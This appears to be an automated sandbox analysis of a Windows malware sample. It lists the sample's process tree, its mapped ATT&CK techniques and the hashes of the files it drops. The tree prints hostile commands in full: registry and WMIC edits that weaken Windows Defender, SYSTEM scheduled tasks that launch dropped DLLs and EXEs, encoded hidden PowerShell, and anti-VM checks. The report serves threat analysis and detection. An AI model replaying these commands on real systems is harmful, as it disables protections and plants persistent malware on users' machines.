C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcZNUQZLP" /SC once /ST 09:43:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:1864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcZNUQZLP"2⤵PID:5228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcZNUQZLP"2⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵PID:4612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:3152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵PID:876
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:4360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AxfyqSaZTcFttLJtv" /SC once /ST 05:04:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\EydzSrR.exe\" T3 /SaVadidIH 385132 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AxfyqSaZTcFttLJtv"2⤵PID:4940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 6162⤵
- Program crash
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:1936 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5160
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5860
-
C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\lEOjaxW.exeC:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\lEOjaxW.exe d4 /KrJWdidFb 525403 /S1⤵
- Executes dropped EXE
PID:5932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 5242⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 6052 -ip 60521⤵PID:6116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:2732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5932 -ip 59321⤵PID:2524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5888 -ip 58881⤵PID:5084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:3256
-
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exeC:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3656
-
C:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\EydzSrR.exeC:\Windows\Temp\hwSlakOgexbeQMmf\haxZTeUOcKzKbBE\EydzSrR.exe T3 /SaVadidIH 385132 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1616 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "blQxnfAaNNFZMWpemd"2⤵PID:4060
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3200
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:760
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3220 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:2180
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WIQLPldOU\VJIXGD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zuAKRFeuERsPXGg" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zuAKRFeuERsPXGg2" /F /xml "C:\Program Files (x86)\WIQLPldOU\GxKSAzb.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zuAKRFeuERsPXGg"2⤵PID:4336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zuAKRFeuERsPXGg"2⤵PID:5008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lJTDNNrzcsGlGa" /F /xml "C:\Program Files (x86)\qMeQRvtmXyxU2\eeQeSZL.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VRuKNmtcmCQGr2" /F /xml "C:\ProgramData\JHBMAPUCCwSCzfVB\HoMgyvA.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UZNAYPGMDJwYFtgCO2" /F /xml "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\UKAgkwh.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dnucZiIKRABpvEFHHbL2" /F /xml "C:\Program Files (x86)\ixMyiQryENPMC\GVnXfSv.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cTixPRTTdvXlYhynT" /SC once /ST 01:03:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\hwSlakOgexbeQMmf\BBIFXmKR\sFZmylZ.dll\",#1 /OeididmVZ 385132" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cTixPRTTdvXlYhynT"2⤵PID:6060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HQvyk1" /SC once /ST 00:15:18 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""2⤵
- Scheduled Task/Job: Scheduled Task
PID:1332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HQvyk1"2⤵PID:1924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1576 -ip 15761⤵PID:2436
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\BBIFXmKR\sFZmylZ.dll",#1 /OeididmVZ 3851321⤵PID:1600
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\BBIFXmKR\sFZmylZ.dll",#1 /OeididmVZ 3851322⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2288 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cTixPRTTdvXlYhynT"3⤵PID:2248
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:1548
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
PID:3652
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
4Windows Service
4Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD50057ea73e0ece7aef7ad3b06e7f51312
SHA1b42ef199cb642969eac6de1fbfcb9682d32f016f
SHA256eb28dff22410bc077ff3a3e4c67f25166e1619e432c4af014b050b719c65ce7d
SHA512ed2cdea9ad12c94e85ddfc683c68ca5d759e4fa2d51519cab4634c76b022fc7694a2c4ce7b2b527559fec9d78e4429b3473cb8c3d9e6055a4856aed3cf68a5c1
-
Filesize
3.7MB
MD579380247b6c6bfb9a8dd0c786912f3ec
SHA1ccbe5378183fe044c2d8f3ba29b0ad6eaaff9108
SHA256da9febb98044c3169c06f6137f71fe037b605f704078a18eaa64f0cdb892c15e
SHA512614984f03e227eec207a1910456c5c0edd12806c4d4fd6c10356278ff59c63e4a0621a9713f65130161189afbbac7d4507fd18a3f486c812f7f3b0c6a028dd8c
-
Filesize
114KB
MD5a2bc4eb3c67f34d75effa9bde49c2ffb
SHA1f38bf9e1468d1dd11a5d197c8befcbf9302e4e57
SHA256a2afda6ed0239af2873e61cffb2817572f9f5ce278b509d6c9c9e5f368a178e5
SHA51230fd383d5b385ffb7f6551ea64636189bfa090a9097e8373574c6dcf3c9e7bbc8c08035057a5565fd139dc505e1ca40cd83df477c2ee67a605d0a2cf8481dffe
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
20KB
MD5a603e09d617fea7517059b4924b1df93
SHA131d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
35KB
MD552c6fa63e17709e93079ed3169531751
SHA140362c566a1ef580c8d11279e7473c36f74c0c5d
SHA2567d8eae71b276d017671a6e91916bb3c3f4a950e392f05c0c43b899e3b0d276cd
SHA5128ebd36f22527767409e17ed2dc0f9a94fc8705076d0cf2c6d1965d4df2ecfd8b18ffe880b1b18412999074fda8321ce3b653809ab2b38c44679c57c9ca9a9b2d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5267c907a08ff5aea7966314bb35692e6
SHA1114b746e22a5a7385f2a98e46233e557661b12cb
SHA256a9a49768adc66b5afab696411af2385b2848f752431359684e5f92dc2d7bb39c
SHA5128b49975567068e6987a5da404799e1f319201990225cc2a661b13667e34cb5136ae8337d73709303b9c220f8972e0e11ac3f921c6e6c3465a5b7473fc5b7a4b5
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ehv06adt.default-release\activity-stream.discovery_stream.json.tmp
Filesize18KB
MD5d47db67710b3ddf1e7e7056176c0b060
SHA18a82e8790b1a846fc62e727959cb7c45a2756fa1
SHA256719d5b30088f8bbb3033d3935c6df9cedf7f9fd377b1a48653da82acc5a2b75b
SHA5126d93e4d586b8b74ffb25abd53cd3a3fc54318c9bf3da92e6fdc47c74e008a74c4762cd48e562114d92b3e1dfc15c2e360d7bbb5b683f83427173d5c4d39e7287
-
Filesize
1.2MB
MD5bea6ed281b600eae06be252f581721c1
SHA125fae547b4ad0a74bcc0bdf7e819f2c56d8be05d
SHA256d18bbfa83202881061743177527c4f1ea0681c658028dd7dd0468f9a8a39e7cf
SHA512746a1bcae568caaf399ec8ca393250d6846235296088e22a2c8d80ce290e13d5845d79d7848b4f46adce2dad147b91c3731059b44ce7370f26072c999758bb42
-
Filesize
6.4MB
MD54fd7265809b8017d87691aebe76f39f3
SHA1fc00f92a82cb8b4e5d16ac2614e2ac0b3c9919af
SHA256bd0e5e246fb6635606cdb8c233173a5a940ea556e98421ad33a8ac130dc96c3e
SHA5126e3dae0258706deb60d0b35c6924324557af0497343892d9764c06aa6187ee41a4e96d6b2b65021960b7decc895875d58638fd34bda10f005fd4318a1a3488aa
-
Filesize
6.4MB
MD53f42b250818f1feb91890d1eb624b05f
SHA1f4887892d88381c92ab84a2e3a45cf0ed067ea88
SHA256d7e26941afa2bfa72b52cd4e975ff067a686ad69cf8f35bf6584f4172327ab6a
SHA5122365fd9f726d7cf444170be638b0ef0530bc71f3ad957496865711184fb11ee25caa6116ce41f120681decd805697a4dffee9c0638a9399e8dd1d7c65989d3aa
-
Filesize
6.8MB
MD540e77e23b5a945c6d3ade703499ad40a
SHA1eae8084ac46d70efbbaca2f8090850a976ecafb5
SHA2563cc5d9504e660047094eb426658209cb0acc72d6d59d59c9a43af87c10f85843
SHA512a910f6bc15b3c60202db3e67b27305bb0b28ee228c3f75e7ba6b43deedd544f4738f1590e7d32cbed1665ef136e39e21184c940f11d44d4ce49d85cb7aeddda8
-
Filesize
6.8MB
MD5b88154b4bba28d4a5a77de4288caa914
SHA16366388e441b5d19ce76492591d3578997b03c47
SHA2563435db8868cf3796ce484cd26c0dd26597d6d660eaa9437cc6e4403591140415
SHA512842929702e20d77776affcb12158b3226a09e114f3cffde04539f4521ff99cccbe2abd6710535a115c11cc570677b9ec1668cff1bef94aa447151e63bbf8a84c
-
Filesize
32KB
MD5c18ed82ea8c7d9081f167373d5a765d9
SHA11706e8d276343f799a21e9ae08e77f0424aea339
SHA25670d7d64ccf506d5dc0cda5aa67518189c21b2cbb0c6a7af8a4e74e9539de7825
SHA512071d1b851446c4d6c6a722b80fd3037ff1c005b586f24f9e229dcf9ca962bee58c32720a2bf11911d808e73ba8390f5055cc4614afdfee21811b9b887fdb3513
-
Filesize
42KB
MD52453cd07e028170480c5b48f4924b67d
SHA146a59c16db05fcfb84fed33c9932c9724838a0ea
SHA256ba786355c6959758136f260f28bbc8cd67884b69e36c1a64f515baecda0df4e4
SHA5122115720a8c3a9e73ec2166c08363d000f05a4911a2e38f83b30c6bcd133402e619507966bddc68737587dc5ac8f60cd39be27d2347ca0a2205ccac9ff4c8f8af
-
Filesize
52KB
MD5ff0e11be9fd4606e5ad00a89879856e6
SHA19a4bcf379d6e0d5538559378e2144c214526435b
SHA256cd0ba62ae4aa132df45708b6661fcf3cec75ec7b027e8be2c215fd3a0dd76cd0
SHA51264963b66237150ef98c60ad2c3ca34f414b545886a6f0a2646abbd6dd194f68c85e2e6cdfae5870131d620fe79d5d2a02c0ef74030b70c6674425f3ba447fe7b
-
Filesize
49KB
MD595d8787115394aa0ed6cc30862606605
SHA15af2aa3e40289cd9455c3e46f3f2df87213fc02d
SHA256e19b46fe431196dccd0fe8e91d3d2c2994e093b012cd9f73f99d852280e0c196
SHA5121f4efa14b1de096794952dae6c1b540fed7d2a8350009d158368791ca63f8cda3aa68945404929e9de30d58083ba7a263c87d54774fdb62b71f57e13a80f7734
-
Filesize
52KB
MD5819da0d3f36272eb0692bf6a438f45ed
SHA19d3fb8879a26c353c85901c5e5aacec0c28fea6e
SHA2565f3b858ce0fabb14d1bdcdbf73b984a932db719d073a04013376093b32d3f4fb
SHA5122bfc221ef497a4ce8da3d332878a7a7e535377daaab528aebd9e484bd25ec625b3b34bdf8116cf45ac282df3f1f343d619f8faad9c9a5a1c622d2fcbe6a7d199
-
Filesize
53KB
MD579cede3e951130d118d2541f5c6e7e82
SHA186566db43209350cfdad16711ac1a2314e1c37dd
SHA2563fd1509b068b7f2382025cc3b4306448ed2b7ed081a75430360eaae982e19da8
SHA5120f7a06ae8e64915798f1156ef7ed0eccc2e831e47f6d8c4ec52d61b6c61fb322812760d0fdde8bdee026a469be5e7a3c3e1e451e841fd8f8f0f17870dd104bf4
-
Filesize
217B
MD5e47d7c82216757ead7d630d61b10331b
SHA132599b16a0ec633037bdbb2933b0213169e61a2a
SHA256657e5120d05cae32d1b5f6bd1199bbbdde3ec28d74a8f90f33ce180b592e75ff
SHA512cf6e7e7a58ca4dc1bdcf136690d4636b84b66c8f08d70bc7e02ffaac228e2b4c9a8a1cd38e7e79045f454cdea3837964062a9bf555eba3ab45acab8c47f950ba
-
Filesize
27KB
MD551dfe6fe23c0737c906a29ba288c7256
SHA1eda478a421e8e8f5e7a55da8d93a67aad4031a36
SHA2562e41250ef2d8fa1ce4c603b43a85c943aabf66c202f95fab16786848a2c0e93b
SHA512056b29ca7677f9a9303fe3565c0e3351e85f925d12edb6cb527025e358d4827c4823921185230cea2a1ea4f1a43f034ec313b500964492e95cf899e672c67082
-
Filesize
21KB
MD5b3f8eb5788df9a8313cd421b0261aa5a
SHA17a5c3e22482f38c63b287a301e8fb1c64bd0e1f2
SHA25620c373e4563bfb772c4b6f377187b4a40d2cf9a0e68a99c08ef1924226d29f09
SHA5128fec7e9da5a7b417eb71ec531a83d5dfeb85b796fcf78367f31a295775ac9e53dbfe0e061afb3c6cf945d2ba79bdaa874fe2078f9966def5a68d4683c7235f93
-
Filesize
31KB
MD5d25a6a8619e49d225b370bc1e964a20b
SHA14c6ea046b60b609cba51d2eb029fa1b2fab28a92
SHA256df68b2896894ededce175f11b09809329b54ce4cee27854f31424da7e463b623
SHA5121a5c78f5f15bf883f8792c9a1a4d5ec98eef8a610798dafaa56a727a4c864bf30bede27eb075358e49bb65620a5c8495e85e84d683593c285717c5af032907ac
-
Filesize
50KB
MD51aff3e47ad68412d132811ce22a41102
SHA125d49b22b30743a086406e6281f395f45a2d3c02
SHA2563cb212a1da6d34ecd8238fbab84b581c6af83d30f9e93336a5540aea10aac88b
SHA51237453eb9c5752d0d01c17dc35bad741552c6ee15e8717174a2375ccccde6a62cef15f1eb8d6b23932e8162d025f2c721ed5065c4345a419a1f04ceafec179119
-
Filesize
15KB
MD56cecee44c1dad0bb79f2c16a88cb6062
SHA1c379020fdce7e4af871eebeb3edcd93aaf6c7d32
SHA256ea0490e6651506a582fb5760ac2c23fa3d1c338064348d8abd582085eca61d8e
SHA512d4e7088e1b4e92a529094d37bf74e9c5285a2c14f2d00345a8a1238b2cb80cbce78de316718ce3c6bcdbd2dbb1e1d7714ad143174c4d52578f6497b094bb6d83
-
Filesize
32KB
MD57aa5cb40b4f2443de21da0a0b46ccc5d
SHA19a83d518bcc6c31754fd389232e129d372fc0c5f
SHA25651aa39ebccb32903ee7fa690a1d7c68fd58e9661c9ffd17a3f3421070f847564
SHA512b6ead4ceb0850506d267260f24de2ee4cc8f2523f091babce21ba78669c6cbc6b5a42e3b86b052b76a3ea7b532a9fd896a2a27f7b468f367a313c1deb5877f1c
-
Filesize
65KB
MD509e01401b85caa707c5ff3cebca814e6
SHA14120b4b422bce5541ef97e7aaeeb5a223f42fedc
SHA256e801bb986beec3a9f7451fa157eee944f0b58b164bc06aa01acd9c73df1d74d6
SHA5125452a8aeb473d8a5f7c169b4b67da9d88dbad91b4844122b73823769ac324239f2dfd96ded3c7d4b5ee5b3bb1667614b7935290a6e60193dd50384acf552669b
-
